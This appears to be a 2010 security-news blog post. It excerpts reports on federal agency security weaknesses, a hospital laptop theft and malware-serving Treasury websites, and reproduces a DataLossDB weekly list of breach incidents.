Tuesday, 4 May 2010

Federal mortgage watchdog agency struggles with its information security

By William Jackson
GCN.com
May 03, 2010

The Federal Housing Finance Agency, a fledgling organization created in
2008 to oversee federal mortgage activities, has not fully implemented an information security program, resulting in weaknesses in its information technology security, according to the Government Accountability Office.

"FHFA has made important progress in developing and documenting its policies and procedures for the agency's information security program,"
GAO concluded in its report. "However, policies, procedures, plans, and technical standards related to information security did not always reflect the current agency operating environment; and FHFA did not always effectively monitor its systems."

GAO found that FHFA did not always maintain authorization records for network and system access, and did not enforce least-privilege policies for system and application users. It also did not have adequate physical security and environmental safety controls for facilities housing IT resources.

"Until the agency strengthens its logical access and physical access controls and fully implements an information security program that includes policies and procedures reflecting the current agency environment, increased risk exists that sensitive information and resources will not be sufficiently protected from inadvertent or deliberate misuse, improper disclosure, or destruction," GAO concluded.

[...]

Laptop stolen from mammo suite with data on 5,400 patients

By Editorial Staff
HealthImaging.com
May 2, 2010

The Medical Center in Bowling Green, Ky., is currently notifying 5,418 patients of a breach of personal protected health information, resulting from the theft of computer equipment from its mammography suite containing information on patients who underwent bone density testing between 1997 and 2009.

At this point the provider said it had no reason to believe the device was stolen for the information on it or that any personal information has been released or used.

On April 1, the Medical Center said it discovered that the laptop had been stolen from its mammography suite. Upon learning of the theft, the facility launched an investigation of the incident, and the theft has been reported to the Bowling Green Police Department.

The facility has since discovered the data on the device included each patient's name, date of birth, address, medical record number and physician name. Some patients' records also included information, such as social security numbers, weight, height and menopause age. The data on the hard drive was not encrypted; however, the hard drive was maintained in a locked, non-public, private area, according to the hospital.

[...]


data loss weekly summary

Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, April 25, 2010

11 Incidents Added.

========================================================================

DataLossDB is a research project aimed at documenting known and reported data loss incidents world-wide. The Open Security Foundation asks for contributions of new incidents and new data for existing incidents. For any questions about the project or the data contained within this email or the website (http://www.datalossdb.org), please contact us at curators@datalossdb.org.

========================================================================

DataLossDB News/Updates

No news this week!


========================================================================

Incidents Added


Reported Date: 2010-04-29
Summary: Stolen computers expose 20,000 patients names, dates of birth and Social Security numbers
Organizations: St. Jude Heritage Medical Center
http://datalossdb.org/incidents/2759
---------------------

Reported Date: 2010-04-28
Summary: Payroll services company erroneously merges two organizations' data, exposing names, Social Security numbers, and benefits information of employees
Organizations: Paychex
http://datalossdb.org/incidents/2757
---------------------

Reported Date: 2010-04-28
Summary: Stolen hard drive exposes 5,418 patients names, addresses, dates of birth, and medical numbers
Organizations: The Medical Center at Bowling Green
http://datalossdb.org/incidents/2758
---------------------

Reported Date: 2010-04-28
Summary: Employee accidentally emails students names, addresses and Social Security numbers
Organizations: Montana Tech of The University of Montana
http://datalossdb.org/incidents/2756
---------------------

Reported Date: 2010-04-26
Summary: Email attachment exposes 33 students email including names, GPAs and student ID numbers
Organizations: University of Wisconsin - Milwaukee
http://datalossdb.org/incidents/2750
---------------------

Reported Date: 2010-04-26
Summary: Employee steals at least 70 adoptive and foster parents personal details
Organizations: Texas Child Protective Services Division
http://datalossdb.org/incidents/2751
---------------------

Reported Date: 2010-04-26
Summary: Hundreds of patients medical files dumped outside closed office exposing names, addresses, Social Security numbers
Organizations: DRC Physical Therapy Plus
http://datalossdb.org/incidents/2749
---------------------

Reported Date: 2010-04-23
Summary: Data backup inadvertently sent to an unauthorized storage source
Organizations: ESB Financial
http://datalossdb.org/incidents/2754
---------------------

Reported Date: 2008-12-08
Summary: Lost Computer contained personal information
Organizations: YMCA of Metropolitan Los Angeles
http://datalossdb.org/incidents/2752
---------------------

Reported Date: 2008-05-02
Summary: Problem with data processing caused mail documents to goto wrong customers
Organizations: Sterling Jewlers Inc.
http://datalossdb.org/incidents/2753
---------------------

Reported Date: 2008-02-12
Summary: Individual found to have copies of confidential documents including personal information.
Organizations: Marlborough Hospital
http://datalossdb.org/incidents/2755
---------------------


========================================================================

Blotter Posts


Added: 2010-05-01
Title: Palin hacker found guilty on two counts http://feedproxy.google.com/~r/SCMagazineHome/~3/wKD2hi43Ugw/
---------------------

Added: 2010-04-29
Title: Report: Palin e-mail snooping jury deadlocked http://www.computerworld.com/s/article/9176146/Report_Palin_e_mail_snooping_jury_deadlocked?source=rss_networking
---------------------

Added: 2010-04-29
Title: Medicare scam makes the rounds statewide http://blog.dispatch.com/wallet/2010/04/medicare_scam_makes_the_rounds.shtml
---------------------

Added: 2010-04-29
Title: How Data Laws Slap Insecure Companies http://www.forbes.com/2010/04/27/breach-disclosure-data-technology-security-laws.html?feed=rss_home
---------------------

Added: 2010-04-29
Title: Washington driver license changing to protect IDs http://seattletimes.nwsource.com/html/localnews/2011720527_apwadriverlicensechange.html?syndication=rss
---------------------

Added: 2010-04-27
Title: US court sentences Indian to 81 months in prison http://timesofindia.indiatimes.com/World-Indians-Abroad/US-court-sentences-Indian-to-81-months-in-prison/articleshow/5862167.cms
---------------------

Added: 2010-04-27
Title: Vets use settlement millions from identity-theft suit against VA to help other vets http://feeds.nydailynews.com/~r/nydnrss/news/~3/3ktvti24xvc/2010-04-27_vets_use_settlement_millions_to_help_vets.html
---------------------

Added: 2010-04-27
Title: Tidal wave of ID theft fraud sweeps the UK, survey reveals http://www.computerweekly.com/Articles/2010/04/26/241034/tidal-wave-of-id-theft-fraud-sweeps-the-uk-survey-reveals.htm
---------------------

Added: 2010-04-27
Title: How Well Do Hospitals Protect Your Data? Abysmally
http://feeds.informationweek.com/click.phdo?i=aaa3646e7ef5598a22fdf42cc604f880
---------------------


_______________________________________________
Dataloss Mailing List (dataloss@datalossdb.org)

CREDANT Technologies, a leader in data security, offers advanced data encryption solutions.
Protect sensitive data on desktops, laptops, smartphones and USB sticks transparently across your enterprise to ensure regulatory compliance.
http://www.credant.com/stopdataloss

Hacked US Treasury websites serve visitors malware

By Dan Goodin in San Francisco
The Register
3rd May 2010

Updated - Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs, a security researcher warned on Monday.

The infection buries an invisible iframe in bep.treas.gov, moneyfactory.gov, and bep.gov that invokes malicious scripts from grepad.com, Roger Thompson, chief research officer of AVG Technologies, told The Register. The code was discovered late Sunday night and was active at time of writing, about 12 hours later.

To cover their tracks, the miscreants behind the compromise tailored it so it attacks only IP addresses that haven't already visited the Treasury websites. That makes it harder for white hat-hackers and law enforcement agents to track the exploit. Indeed, Thompson initially reported that the problem had been fixed until he discovered the sites were merely skipping over laboratory PCs that had already encountered the attack.

The attack is most likely related to mass infections that two weeks ago hit hundreds of sites hosted by Network Solutions and GoDaddy, said Dean De Beer, founder and CTO of security consultancy Zero(day) Solutions.

[...]

emails

a

The Register - Security

IQ test

The Register - Security: Anti-Virus

HackWire - Hacker News